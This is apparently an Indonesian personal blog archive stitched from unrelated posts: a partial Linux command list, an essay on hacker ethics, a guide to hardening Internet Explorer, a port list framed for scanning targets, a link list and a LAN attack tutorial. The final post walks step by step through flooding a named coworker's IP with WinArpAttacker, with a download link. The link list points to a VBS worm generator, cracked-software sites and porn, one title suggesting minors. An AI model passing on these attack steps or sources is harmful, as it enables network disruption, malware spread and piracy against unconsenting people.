Perintah ini sama fungsinya dengan perintah more (melihat isi dari sebuah file) dan hampir sama juga dengan perintah
cat. 20. Perintah login Untuk masuk ke sistem dengan memasukkan login ID atau dapat juga digunakan untuk berpindah
dari user satu ke user lainnya.
21. Perintah logout
Perintah yang digunakan apabila kita mau keluar dari sistem
22. Perintah ls
Menampilkan isi dari sebuah direktori seperti perintah dir di DOS. Anda dapat menggunakan beberapa option yang
disediakan untuk mengatur tampilannya di layar. Bila Anda menjalankan perintah ini tanpa option maka akan ditampilkan
seluruh file nonhidden(file tanpa awalan tanda titik) secara alfabet dan secara melebar mengisi kolom layar. Option -la
.: aNoThEr_sIdE_aBouT_LiFE :.
http://www.obedilleh.web.id Powered by Joomla! Generated: 23 June, 2008, 15:44
artinya menampilkan seluruh file/all termasuk file hidden(file dengan awalan tanda titik) dengan format panjang.
$ ls
$ ls -al
$ ls -la
23. Perintah man
Untuk menampilkan manual page atau teks yang menjelaskan secara detail bagaimana cara penggunaan sebuah
perintah. Perintah ini berguna sekali bila sewaktu-waktu Anda lupa atau tidak mengetahui fungsi dan cara menggunakan
sebuah perintah. $ man
24. Perintah mesg
Perintah ini digunakan oleh user untuk memberikan ijin user lain menampilkan pesan dilayar terminal. Misalnya mesg
Anda dalam posisi y maka user lain bisa menampilkan pesan di layar Anda dengan write atau talk. $ mesg y atau mesg
n Gunakan mesg n bila Anda tidak ingin diganggu dengan tampilan pesan-pesan dari user lain.
25. Perintah mkdir
Membuat direktori baru, sama dengan perintah md di DOS. $ mkdir
26. Perintah more
Mempaging halaman, seperti halnya less.
27. Perintah mount
Perintah ini akan me-mount filesystem ke suatu direktori atau mount-point yang telah ditentukan. Hanya superuser yang
bisa menjalankan perintah ini. Untuk melihat filesystem apa saja beserta mount-pointnya saat itu, ketikkan perintah
mount. Perintah ini dapat Anda pelajari di bab mengenai filesystem. Lihat juga perintah umount.
$ mount
/dev/hda3 on / type ext2 (rw)
none on /proc type proc (rw)
/dev/hda1 on /dos type vfat (rw)
/dev/hda4 on /usr type ext2 (rw)
none on /dev/pts type devpts (rw,mode=0622)
28. Perintah mv
Untuk memindahkan file dari satu lokasi ke lokasi yang lain. Bila argumen yang kedua berupa sebuah direktori maka mv
akan memindahkan file ke direktori tersebut. Bila kedua argumen berupa file maka nama file pertama akan menimpa file
kedua. Akan terjadi kesalahan bila Anda memasukkan lebih dari dua argumen kecuali argumen terakhir berupa sebuah
direktori.
$ mv psybnc /var/tmp
$ mv psybnc
29. Perintah passwd
Digunakan untuk mengganti password. Anda akan selalu diminta mengisikan password lama dan selanjutnya akan
diminta mengisikan password baru sebanyak dua kali. Password sedikitnya terdiri dari enam karakter dan sedikitnya
mengandung sebuah karakter. $ passwd
30. Perintah pwd
Menampilkan nama direktori dimana Anda saat itu sedang berada.
31. Perintah rm
Untuk menghapus file dan secara default rm tidak menghapus direktori. Gunakan secara hati-hati perintah ini terutama
dengan option -r yang secara rekursif dapat mengapus seluruh file.
$ rm -rf
$ rm -f
$ rm
32. Perintah rmdir
Untuk menghapus direktori kosong. $ rmdir
33. Perintah shutdown
Perintah ini untuk mematikan sistem, seperti perintah halt. Pada beberapa sistem anda bisa menghentikan komputer
dengan perintah shutdown -h now dan merestart sistem dengan perintah shutdown -r now atau dengan kombinasi
tombol Ctr-Alt-Del.
# shutdown -r now
34. Perintah su
Untuk login sementara sebagai user lain. Bila user ID tidak disertakan maka komputer menganggap Anda ingin login
sementara sebagai super user atau root. Bila Anda bukan root dan user lain itu memiliki password maka Anda harus
memasukkan passwordnya dengan benar. Tapi bila Anda adalah root maka Anda dapat login sebagai user lain tanpa
perlu mengetahui password user tersebut.
35. Perintah tail
Menampilkan 10 baris terakhir dari suatu file. Default baris yang ditampilkan adalah 10 tapi Anda bisa menentukan
sendiri berapa baris yang ingin ditampilkan:
$ tail
36. Perintah talk
Untuk mengadakan percakapan melalui terminal. Input dari terminal Anda akan disalin di terminal user lain, begitu
sebaliknya.
37. Perintah tar
.: aNoThEr_sIdE_aBouT_LiFE :.
http://www.obedilleh.web.id Powered by Joomla! Generated: 23 June, 2008, 15:44
Menyimpan dan mengekstrak file dari media seperti tape drive atau hard disk. File arsip tersebut sering disebut sebagai
file tar. Sintaknya sebagai berikut:$ tar
38. Perintah umount
Adalah kebalikan dari perintah mount, yaitu untuk meng-unmount filesystem dari mount-pointnya. Setelah perintah ini
dijalankan direktori yang menjadi mount-point tidak lagi bisa digunakan. # umount
39. Perintah unalias
Kebalikan dari perintah alias, perintah ini akan membatalkan sebuah alias.
Jadi untuk membatalkan alias dir seperti telah dicontohkan diatas, gunakan perintah:
$ unalias dir
40. Perintah unzip
Digunakan untuk mengekstrak atau menguraikan file yang dikompres dengan zip. Sintaknya sederhana dan akan
mengekstrak file yang anda tentukan:
$ unzip
Lihat juga perintah-perintah gzip dan unzip.
41. Perintah wall
Mengirimkan pesan dan menampilkannya di terminal tiap user yang sedang login. Perintah ini berguna bagi superuser
atau root untuk memberikan peringatan ke seluruh user, misalnya pemberitahuan bahwa server sesaat lagi akan
dimatikan. # who Dear, everyone….. segera simpan pekerjaan kalian, server akan saya matikan 10 menit lagi.
42. Perintah who
Untuk menampilkan siapa saja yang sedang login. Perintah ini akan
menampilkan informasi mengenai login name, jenis terminal, waktu login dan remote hostname untuk setiap user yang
saat itu sedang login. Misalnya: $ who
43. Perintah xhost +
Perintah ini digunakan untuk memberi akses atau menghapus akses(xhost -) host atau user ke sebuah server X.
44. Perintah xset
Perintah ini untuk mengeset beberapa option di X Window seperti bunyi bel, kecepatan mouse, font, parameter screen
saver dan sebagainya. Misalnya bunyi bel dan kecepatan mouse dapat Anda set menggunakan perintah ini: $ xset b $
xset m
45. Perintah zip
Perintah ini akan membuat dan menambahkan file ke dalam file arsip zip. Lihat juga perintah gzip dan unzip.

Senin, 27 April 2009

Dunia Bawah Tanah di Internet

Dunia Bawah Tanah di Internet


Seperti juga dunia lainnya ada segmen dunia yang tidak suka / tidak mau menggunakan hukum tertulis, bertumpu pada struktur & pengadilan. Dunia ini juga ada di Internet, mereka sangat gila dengan komputer / kemampuan akses ke komputer dan apapun yang dapat mengajarkan kepada mereka bagaimana dunia komputer khususnya bekerja; semua dilakukan tanpa batas & totalitas. Mereka tidak suka menyembunyikan informasi, dan semua informasi harus bebas, terbuka & transparan – aliran copyleft lebih banyak penganutnya daripada copyright. Mereka tidak percaya pada autoritas, birokrasi, penguasa – kekuasaan harus terdesentralisasi. Seseorang dinilai dari kemampuannya, bukan kriteria-kriteria buatan seperti gelar, jabatan, umum, posisi, atau suku bangsa. Mereka membuat seni & keindahan di komputer & mereka percaya bahwa komputer akan membawa kita semua ke kondisi yang lebih baik. Konsep hidup & etika di atas di formulasikan oleh Steven Levy 1984 dari pengamatan masyarakat bawah tanah di Internet dalam bukunya Heroes of the Computer Revolution.

Saya yakin sebagian besar dari kita bisa meraba siapakah mereka ini? Betul, mereka adalah para hacker. Masyarakat yang tidak terlihat, tidak terdeteksi, seperti siluman, mereka hidup & berjaya di dunia maya – tanpa terdeteksi oleh pengguna Internet biasa, tak terdeteksi oleh sistem administrator WARNET & ISP.

Oleh Media & stereotype masyarakat membentuk karakter hacker sebagai orang jahat dan suka merusak. Stereotype ABG 15-20 tahun-an, yang duduk di belakang komputer berjam-jam, masuk ke sistem dan men-delete, berbelanja menggunakan kartu kredit curian atau menghancurkan apa saja yang bisa mereka hancurkan – “anak” ini dikenal sebagai cracker bukan sebagai hacker. Cracker ini yang sering anda dengar di berita / media, mematikan situs web, menghapus data dan membuat kekacauan kemanapun mereka pergi. Hacker yang betul sebenarnya tidak seperti yang ada dalam stereotype banyak orang di atas.

Di dunia elektronik underground nama jelas & nama lengkap tidak digunakan. Orang biasanya menggunakan nama alias, callsign atau nama samaran. Hal ini memungkinkan kita bisa menyamarkan identitas, dan hanya di kenali sesama underground. Beberapa nama diantara hacker Indonesia bisa dikenali seperti hC, cbug, litherr, fwerd, d_ajax, r3dshadow, cwarrior, ladybug, chiko, gelo, BigDaddy dsb..

Apakah perbedaan mendasar antara seorang cracker & hacker? Di http://www.whatis.com, cracker di definisikan sebagai “seseorang yang masuk ke sistem orang lain, biasanya di jaringan komputer, membypass password atau lisensi program komputer, atau secara sengaja melawan keamanan komputer. Cracker dapat mengerjakan hal ini untuk keuntungan, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem”

Berbeda dengan Cracker, Hacker menurut Eric Raymond di definisikan sebagai programmer yang pandai. Sebuah hack yang baik adalah solusi yang cantik kepada masalah programming dan “hacking” adalah proses pembuatan-nya. Ada beberapa karakteristik yang menandakan seseorang adalah hacker, seperti (1) dia suka belajar detail dari bahasa pemrograman atau system, (2) dia melakukan pemrograman tidak cuma berteori saja, (3) dia bisa menghargai, menikmati hasil hacking orang lain, (4) dia dapat secara cepat belajar pemrogramman, dan (5) dia ahli dalam bahasa pemrograman tertentu atau sistem tertentu, seperti “UNIX hacker”.

Yang menarik, ternyata dalam dunia hacker terjadi strata / tingkatan / level yang diberikan oleh komunitas hacker kepada seseorang karena kepiawaiannya, bukan karena umur atau senioritasnya. Proses yang paling berat adalah untuk memperoleh pengakuan / derajat / acknowledgement diantara masyarakat underground, seorang hacker harus mampu membuat program untuk meng-eksploit kelemahan sistem, menulis tutorial (artikel) biasanya dalam format ASCII text biasa, aktif diskusi di mailing list / IRC channel para hacker, membuat situs web dsb. Entah kenapa warna background situs web para hacker seringkali berwarna hitam gelap, mungkin untuk memberikan kesan misterius. Proses memperoleh acknowledgement / pengakuan, akan memakan waktu lama bulanan bahkan tahun, tergantung ke piawaian hacker tersebut.

Proses memperoleh pengakuan di antara sesama hacker tidak lepas dari etika & aturan main dunia underground. Etika ini yang akhirnya akan membedakan antara hacker & cracker, maupun hacker kelas rendahan seperti Lamer & Script Kiddies.

Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio http://packetstorm.securify.com/docs/hack/ethics/my.code.of.ethics.html, yaitu:

• Di atas segalanya, hormati pengetahuan & kebebasan informasi.
• Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
• Jangan mengambil keuntungan yang tidak fair dari hack.
• Tidak mendistribusikan & mengumpulkan software bajakan.
• Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.
• Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.
• Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
• Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
• Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
• Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Jelas dari Etika & Aturan main Hacker di atas, sangat tidak mungkin seorang hacker betulan akan membuat kerusakan di komputer.

Tentunya ada berbagai tingkatan / strata di dunia underground. Saya yakin tidak semua orang setuju dengan derajat yang akan dijelaskan disini, karena ada kesan arogan terutama pada level yang tinggi. Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering di sebut ‘suhu’. Sedangkan, di ujung lain derajat hacker dikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’. Yang pasti para pencuri kartu kredit bukanlah seorang hacker tingkat tinggi, mereka hanyalah termasuk kategori hacker kelas paling rendah / kacangan yang sering kali di sebut sebagai Lamer. Mereka adalah orang tanpa pengalaman & pengetahuan biasanya ingin menjadi hacker (wanna-be hacker). Lamer biasanya membaca atau mendengar tentang hacker & ingin seperti itu. Penggunaan komputer Lamer terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS (Denial of Service). Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya Lamer hanya akan sampai level developed kiddie atau script kiddie saja; pada tingkatan kiddie ini biasanya hacker masih banyak bergantung pada Grafik User Internet (GUI) atau Windows, karena belum paham betul untuk melakukan programming dengan baik.

Dua tingkat tertinggi para hacker & yang membuat legenda di underground dunia maya, adalah tingkat Elite & Semi Elite. Barangkali kalau di terjemahkan ke bahasa Indonesia, tingkat ini merupakan suhu dunia underground. Elite juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

Hacker tingkat atas (suhu), biasanya akan memilih target secara hati-hati, tanpa terlihat, diam-diam seperti siluman di kegelapan malam. Setelah melalui banyak semedi & membaca banyak buku-buku tentang kerja jaringan komputer, Request For Comment (RFC) di Internet & mempraktekan socket programming. Semua ini tidak pernah di ajarkan di bangku sekolah maupun kuliah manapun. Secara perlahan mereka akan naik hirarki mereka sesuai dengan kemampuannya, tanpa menyombongkan dirinya – itulah para suhu dunia underground. Salah satu suhu hacker di Indonesia yang saya hormati & kagumi kebetulan bekas murid saya sendiri di Teknik Elektro ITB, beliau relatif masih muda + sekarang telah menjadi seorang penting di Research & Development Telkomsel.

Cukup banyak situs di Internet yang bisa menjadi basis pengetahuan underground, beberapa diantara-nya berbahasa Indonesia seperti Kecoa Elektronik http://www.k-elektronik.org, Hackerlink http://www.hackerlink.or.id, maupun Anti-hackerlink (entah dimana lokasinya). Referensi terbaik mungkin bisa dibaca di berbagai situs di luar negeri seperti http://packetstorm.securify.com, , http://neworder.box.sk, http://www.sans.org, http://www.rootshell.com.

Kumpulan Situs Yang beredar di internet.

Kumpulan Situs Yang beredar di internet.
kadang saya bingung kalau browsing di internet apalagi gak tau alamat situs yang mu dicari tambah pusing. dibawah ini ada sederetan situs situs mungkin anda butuhkan.
* Search
- www.yahoo.com
- www.plaza.com
- www.detik.com
- www.google.com
*Software
- www.tgtsoft.com
http://www.tgtsoft.com/view.php?type=explorerbar
http://www.tgtsoft.com/view.php?type=vs
http://www.tgtsoft.com/view.php?type=vs
http://www.tgtsoft.com/view.php?type=wp
http://www.tgtsoft.com/view.php?type=login
http://www.tgtsoft.com/view.php?type=icon
http://www.tgtsoft.com/view.php?type=boot
http://www.tgtsoft.com/view.php?type=cursor
http://www.tgtsoft.com/view.php?type=scr
- www.stardock.com
http://www.stardock.com/products/bootskin
http://www.cursorxp.com/
http://www.stardock.com/products/desktopx
http://www.stardock.com/products/desktopx/documentation/index.html
http://www.stardock.com/products/icondeveloper
http://www.stardock.com/products/desktopx/downloads.asp
http://www.stardock.com/products/iconpackager/
http://www.stardock.com/products/klp
http://www.logonstudio.com/
http://www.stardock.com/products/objectbar
http://www.objectdesktop.net/
http://www.stardock.com/products/objectzip
http://www.stardock.com/order.asp
http://www.stardock.com/order.asp
http://www.stardock.com/order.asp
http://www.stardock.com/order.asp
http://www.stardock.com/products/skinstudio
http://www.thememanager.net/
http://www.stardock.com/
http://www.stardock.com/products/odnt/odnt-upgrade.asp
http://www.wincustomize.com/
http://www.stardock.com/products/windowblinds/
http://www.stardock.com/products/windowfx/
- www.iconzone.com
- www.winamp.com
-
* Sport
- www.f1.com
- www.motogp.com
- www.quiksilver.com
- www.nikefootball.com
- www.bikemovies.com
- www.beritabiliar.com
- www.motorplus.com
- www.momoracing.com
- www.yamaha-motor.co.jp
- www.retroclassiccycles.com
* Bottle
- www.vodka.com
- www.bacardi-breezer.co.uk
- www.absolutcollectors.com
-
* Photo
- www.indonesiaselebriti.com
- www.adolfhitler.com
- www.seggaf.dinnaolivia.com
- www.desktopgirl.com
- www.santabanta.com
- www.sggirls.com
*Desain grafis
http://avocadolite.com/
http://rangerbastards.com/
http://area105.com/
http://theyhatemydesign.net/
http://tragiklabs.com/
http://digitalboedaja.com/ hehehe..
http://vektorjunkie.com/
http://bakmagazine.com/
http://cityku.com
http://www.deviantart.com
http://pixecute.com/
http://magensaa.com/
http://www.godote.com
-
* Sex
- www.duniasex.com
- www.worldsex.com
- www.freesex.com
- www.99bb.com
- www.asiayou.com
- www.exoticazza.com
- www.intipsex.tk
- www.playboy.com
- www.motherdaughterfuck.com
- www.spermswap.com
- www.erotic4u.com
- www.unseenjapan.com
- www.allasians.com
- www.mikeapartment.com
- www.whitemeatonblacksteet.com
- www.lesbiantraining.com
- www.bangbros.co
- www.vipcrew.com
- www.shirouto-teien.com
- www.lalatx.com/free.htm
- www.s1s1s1.com
- www.indonesiasexindex.com
- www.jp-express.com
- www.intheVIP.com
- www.iran69.com
- http://www.weakgame.com/
- www.exploitedteensasia.com
* Paper models
- www.card-models.com
- www.yamahapapercraft.com
- http://www.google.co.id/search?hl=id&q=paper+card+models+ship&meta=
- http://www.peterjvisser.demon.nl/links3.html
*Entertainment
- www.uponone.com
- www.stileproject.com
- www.videoclips.freeserver.co.uk
- www.geocities.com
- www.axe.be
- www.comegetyoursome.com
*Film
- http://usercash.com/go/3/331/
- http://www.uh-oh.com/movies
*Access
- www.Satelindogsm.com
- www.m3-access.com
- www.telkomsel.com
- http://www.klub-mentari.com/info_produk.php?mode=overview
- http://www.xl.co.id/
*Situs yg menyediakan VBSWG :
- http://www.virii.com.ar,
- http://www.kvirii.com.ar,
- http://vx.netlux.org/dat/tv07.shtml.
- http://www.google.com
vbswg2bfix.zip
Vbswg2B.zip
worm generator(VBSWG)
*situs download music
- PROPHECY21.COM
*DOWNLOAD MOVIE*
http://www.divxcrawler.com/movies.htm
*SITUS HACKER TERKENAL*
www.hackingexposed.com/tools/tools.htm
www.atstake.com/research/tools/index.html
www.hoobie.net/security/exploits/index.html
*REDAKSI PC-PLUS*
redaksi@e-pcplus.com
*DAFTAR LENGKAP KODE NEGARA*
-www.iana.org/domain-names.html
-www.ics.uci.edu/pub/websoft/wwwstat/country-codes.txt
*SITUS DOWNLOAD PERCEPAT AKSES INTERNET*
www.robust.ws
*NFS CARBOON*
http://www.easywarez.com/index.php?fid22=7001&search22=sweet%20child%20o%20mine&SUBMIT222=Search
*SOFTWARE HARDWARE DIAGNOSTIC*
www.lavalyst.com
*OVERCLOCKING SOFTWARE*
www.cpuid.com
*PENGUJIAN SAVE OVERCLOCKING*
www.mersenne.org/prime.htm
*SITUS UNTUK MENGETAHUI KEBERADAAN ALAMAT IP*
www.undercoverdetective.com
www.whois.com
www.samspade.com
www.domainwithepages.com
www.visualrate.com
*SLUNDUPAN*
http://www.jasakom.com/article.aspx?ID=810
*RINGTONE HP*
http://antares.sitesfree.com/polyphonic-ringtones.html
http://www.myk510.lasyk.net/
*CRACK*
http://keygen.us/top/index.shtml
http://www.ddlspot.com/?q=touch&type=Movie
http://www.1337warez.com/
http://www.mp3000.net/?proxy=1&noblocker=1
http://www.easywarez.com/
*SITUS REPAIRING O.S*
http://www.spywareinfo.com/~merijn/downloads.html
httpwww.almico.comsfdownload.php
“FREE DOWNLOAD Mp3″
http://stafaband.info/d.php?artist=finch&title=&cari=.%3A%3A+Search+%3A%3A.

Mengatasi Web Script Jahat di Internet

Mengatasi Web Script Jahat di Internet


Jika anda sering melakukan browsing di Internet, sering kali kita memperoleh kiriman script dari situs web yang kita masuki. Script Web ini biasanya baik-baik saja, akan tetapi tidak mustahil akan ada kiriman script jahat tanpa kita sadari yang akan mengirimkan data yang buruk, gambar yang tidak di inginkan, program (script jahat) yang akan meng-compromise (menduduki / menguasai) data anda.

Tulisan ini merupakan saduran bebas tulisan sejenis di Computer Emergency Responds Team (http://www.cert.org) yang membahas masalah script Web jahat. Masalah ini timbul bukan karena Web browser yang kita gunakan, akan tetapi lebih di sebabkan karena bagaimana situs Web di bentuk, dan bagaimana proses validasi data masuk & keluar situs Web yang harusnya menjamin tidak ada script yang tidak baik ini untuk masuk ke web browser klien.

Bagaimana cara web script masuk ke web browser kita? Seorang Web developer yang jahat akan mengirimkan script ke web browser kita pada saat kita memasukan data seperti URL, elemen pada formulir, atau permintaan database. Script jahat akan dikirimkan bersama responds situs Web sesuai permintaan yang diminta; akhirnya script jahat akan mendekam di web browser anda.

Konsekuensi terbukanya web browser ke script jahat, antara lain adalah:

• Mengikuti link yang tidak bisa di percaya di halaman Web, berita e-mail, atau posting di newsgroups.
• Menggunakan formulir interaktif pada situs yang tidak bisa dipercaya.
• Memperhatikan halaman Web yang isinya ditimbulkan secara dinamis oleh orang lain.
• Anda akan terhubung (link) ke situs yang tampaknya aman, dan mengisi form di situs tersebut yang sebetulnya tidak bisa dipercaya, atau mencari database di situ.

Apa yang akan terjadi dengan terbukanya Web browser ke script jahat? Ada beberapa hal yang mungkin terjadi seperti kehilangan password anda, juga tercuri-nya informasi yang mungkin di anggap aman. Script jahat ini bukan mustahil dapat mengeksplorasi kondisi jaringan lokal di organisasi anda (intranet anda) terutama bagi penyerang yang ada di Internet.

Bagaimana cara kita menghindari masalah ini? Cara paling sederhana untuk mengatasi serangan dari script jahat yang masuk dari situs Web adalah dengan cara mematikan semua fasilitas bahasa scripting. Perlu dicatat bahwa dengan matikan fasilitas bahasa scripting belum 100% mematikan serangan, terutama jika programmer tersebut masuk melalui fasilitas HTML untuk membuat
. Sialnya dengan mematikan semua fasilitas ini akan mematikan banyak fungsi Web browser, akhirnya kita harus memilih kapan kita mematikan & kapan menyalakan fasilitas ini untuk memperoleh fungsi yang lebih baik pada saat melakukan browsing.

Cara mengamankan Web browser yang menggunakan Internet Explorer 5 adalah sebagai berikut:

• Start Internet Explorer seperti saat anda akan melakukan browsing
• Dari menu Tools pilih Internet Options... . Akan keluar box dialog Internet Options.
• Pilih Security tab. Akan keluar panel Security Options.
• Klik pada Internet zone untuk memilih itu.
• Klik tombol Custom Level. Akan keluar panel Security Settings.
• Pilih High option dari daftar pull-down.
• Klik tombol Reset. Sebuah box dialog akan keluar menanyakan apakah anda yakin akan mengubah setting security dari zone tersebut.
• Klik Yes. Selanjutnya anda perlu melakukan beberapa perubahan setting dan melakukan perubahan sesuai langkah yang di bawah ini.
• Untuk setting Scripting ActiveX controls yang bertanda safe for Scripting, cek tombol radio untuk men-disable atau keluarkan prompt tergantung level kepercayaan anda.
• Jika anda memutuskan untuk men-disable Java, untuk setting ijin Java, cek tombol radio untuk men-disable Java. Jika anda tidak mempunyai seting ijin Java, artinya Java telah di disable.
• Untuk setting Active scripting dibawah bagian Scripting, cek tombol radio untuk men-disable.
• Klik OK untuk menerima perubahan. Sebuah box dialog keluar menanyakan apakah anda yakin akan perubahan yang dilakukan.
• Klik Yes.
• Di dialog box pilihan Internet Options, klik tab Advanced. Akan keluar pilihan panel Advanced.
• Perhatian / yakinkan bahwa setting pemberitahuan kalau terjadi perubahan antara situs yang aman dan tidak aman di cek.
• Klik Apply untuk menyimpan perubahan yang dilakukan.
• Klik OK untuk menutup dialog box Internet Options.

Dengan logika yang hampir sama anda dapat melakukannya untuk Web browser lainnya termasuk Netscape Communicator.

Sabtu, 25 April 2009

Dafrtar Port...

Hacker atau cracker biasa melakukan port scanning untuk mengetahui layanan TCP
dan UDP yang sedang berjalan, untuk mengetahui sistem operasi yang digunakan, dan bisa juga
untuk mendapatkan informasi mengenai layanan yang tersedia (aplikasi apa dan versi berapa yang
digunakan webserver, mail server, dan sebagainya) pada komputer sasaran.

Proses scanning tentunya tidak akan dilakukan pada semua port yang ada – yang semuanya
berjumlah 131.070 baik port UDP maupun TCP – karena bisa menghabiskan waktu berhari-hari,
tetapi hanya pada port-port tertentu yang diketahui mempunyai kelemahan dan berpotensi menjadi
pintu masuk ke sistem sasaran.

Daftar Port-port tersebut:

echo 7 / tcp
systat 11 / tcp
chargen 19 / tcp
ftp-data 21 / tcp
ssh 22 / tcp
telnet 23 / tcp
SMTP 25 / tcp
nameserver 42 / tcp
whois 43 / tcp
tacacs 49 / udp
xns-time 52 / tcp
xns-time 52 / udp
dns-lookup 53 / udp
dns-zone 53 / tcp
whois++ 63 / tcp / udp
oracle-sqlnet 66 / tcp
bootps 67 / tcp / udp
bootpc 68 / tcp / udp
tftp 69 / udp
gopher 70 / tcp / udp
finger 79 / tcp
http 80 / tcp
alternate web port (http) 81 / tcp
kerberos or alternate web port (http) 88 / tcp
pop2 109 / tcp
pop3 110 / tcp
sunrpc 111 / tcp
sqlserv 118 / tcp
nntp 119 / tcp
ntp 123 / tcp / udp
ntrpc-or-dce (epmap) 135 / tcp / udp
netbios-ns 137 / tcp / udp
netbios-dgm 138 / tcp / udp
netbios 139 / tcp
imap 143 / tcp
snmp 161 / udp
snmp-trap 162 / udp
xdmcp 177 / tcp / udp
bgp 179 / tcp
snmp-checkpoint 256 / tcp
snmp-checkpoint 257 / tcp
snmp-checkpoint 258 / tcp
snmp-checkpoint 259 / tcp
ldap 389 / tcp
netware-ip 396 / tcp
timbuktu 407 / tcp
https/ssl 443 / tcp
ms-smb-alternate 445 / tcp / udp
ipsec-internet-key-exchange (ike) 500 / udp
exec 512 / tcp
rlogin 513 / tcp
rwho 513 / udp
rshell 514 / tcp
syslog 514 / udp
printer 515 / tcp
printer 515 / udp
talk 517 / tcp / udp
ntalk 518 / tcp / udp
route 520 / udp
netware-ncp 524 / tcp
irc-serv 529 / tcp / udp
uucp 540 / tcp / udp
klogin 543 / tcp / udp
mount 645 / udp
remotelypossible 799 / tcp
rsync 873 / tcp
samba-swat 901 / tcp
w2k rpc services 1024 – 1030 / tcp
1024 – 1030 / udp
socks 1080 / tcp
kpop 1109 / tcp
bmc-patrol-db 1313 / tcp
notes 1352 / tcp
timbuktu-srv1 1417 – 1420 / tcp / udp
ms-sql 1433 / tcp
citrix 1494 / tcp
sybase-sql-anywhere 1498 / tcp
funkproxy 1505 / tcp / udp
ingres-lock 1524 / tcp
oracle-srv 1525 / tcp
pracle-tli 1527 / tcp
pptp 1723 / tcp
winsock-proxy 1745 / tcp
radius 1812 / udp
remotely-anywhere 2000 / tcp
cisco-mgmt 2001 / tcp
nfs 2049 / tcp
compaq-web 2301 / tcp
sybase 2368
openview 2447 / tcp
realsecure 2998 / tcp
nessusd 3001 / tcp
ccmail 3264 / tcp / udp
ms-active-dir-global-catalog 3268 / tcp / udp
bmc-patrol-agent 3300 / tcp
mysql 3306 / tcp
sql 3351 / tcp
ms-termserv 3389 / tcp
cisco-mgmt 4001 / tcp
nfs-lockd 4045 / tcp
rwhois 4321 / tcp / udp
postgress 5432 / tcp
secured 5500 / udp
pcanywhere 5631 / tcp
vnc 5800 / tcp
vnc-java 5900 / tcp
xwindows 6000 / tcp
cisco-mgmt 6001 / tcp
arcserve 6050 / tcp
apc 6549 / tcp
irc 6667 / tcp
font-service 7100 / tcp / udp
web 8000 / tcp
web 8001 / tcp
web 8002 / tcp
web 8080 / tcp
blackie-icecap 8081 / tcp
cisco-xremote 9001 / tcp
jetdirect 9100 / tcp
dragon-ids 9111 / tcp
iss system scanner agent 9991 / tcp
iss system scanner console 9992 / tcp
stel 10005 / tcp
Netbus 12345 / tcp
snmp-checkpoint 18210 / tcp
snmp-checkpoint 18211 / tcp
snmp-checkpoint 18186 / tcp
snmp-checkpoint 18190 / tcp
snmp-checkpoint 18191 / tcp
snmp-checkpoint 18192 / tcp
Trinoo_bcast 27444 / tcp
Trinoo_master 27665 / tcp
Quake 27960 / udp
backorifice 31337 / udp
rpc-solaris 32771 / tcp
snmp-solaris 32780 / udp
reachout 43188 / tcp
bo2k 54320 / tcp
bo2k 54321 / udp
netprowler-manager 61440 / tcp
pcanywhere-def 65301 / tcp

Daftar selengkapnya bisa dilihat di Situs
http://www.iana.org/assignments/port-numbers

Nembak IP dari Jauh ! DDOS


Nembak IP dari Jauh ! DDOS


Gimana ya caranya ?
Gue ingin berbagi pengalaman sesama rekan2 komunitas untuk saling sharing Ilmu [ maaf masih newbie ] tentang bagaimana cara nembak IP orang lain.


cara 1 [ dari dalam ]


Ini yang dinamakan dengan Lan Flood , ok ga usa

h banyak komentar langusng aja step by step, Perhatian artikel ini hanya sebagai wujud pembelajaran untuk kita semua tidak bertujuan untuk merusak, sebab akan fatal bila disalahgunakan bisa menyebabkan kartu Lan rusak ,
BtW, let's go

pasang software WIncap, setelah dipsang/install jalankan WinArpattaker

Disitu










akan terlihat banyak menu2, klik SCAN untuk mencari IP target di LAN secara Otomatis














Lihat akan terlihat IP dari LAN secara otomatis, penulis akan coba salah satu IP tersebut

















saya akan mencoba IP 192.

168.0.2 atas nama RIZKA, centang kotak disamping IP tersebut











Masuk ke OPTION sett berapa yang mau kita pergunakan , penulis coba set semaksimal mungkin, klik appl,ok kembali ke menu utama klik ATTACK pilih FLOOD, tunggu beberapa menit maka akan nampak hasilnya






































Dan lihat hasilnya.....wakkakkakkakakka......"there is ip address confict with another system on the network"

ip nya down....met mencoba...!!!

Download:http://www.4shared.com/file/50535884/f80e88e9/WINarpATTACKER.html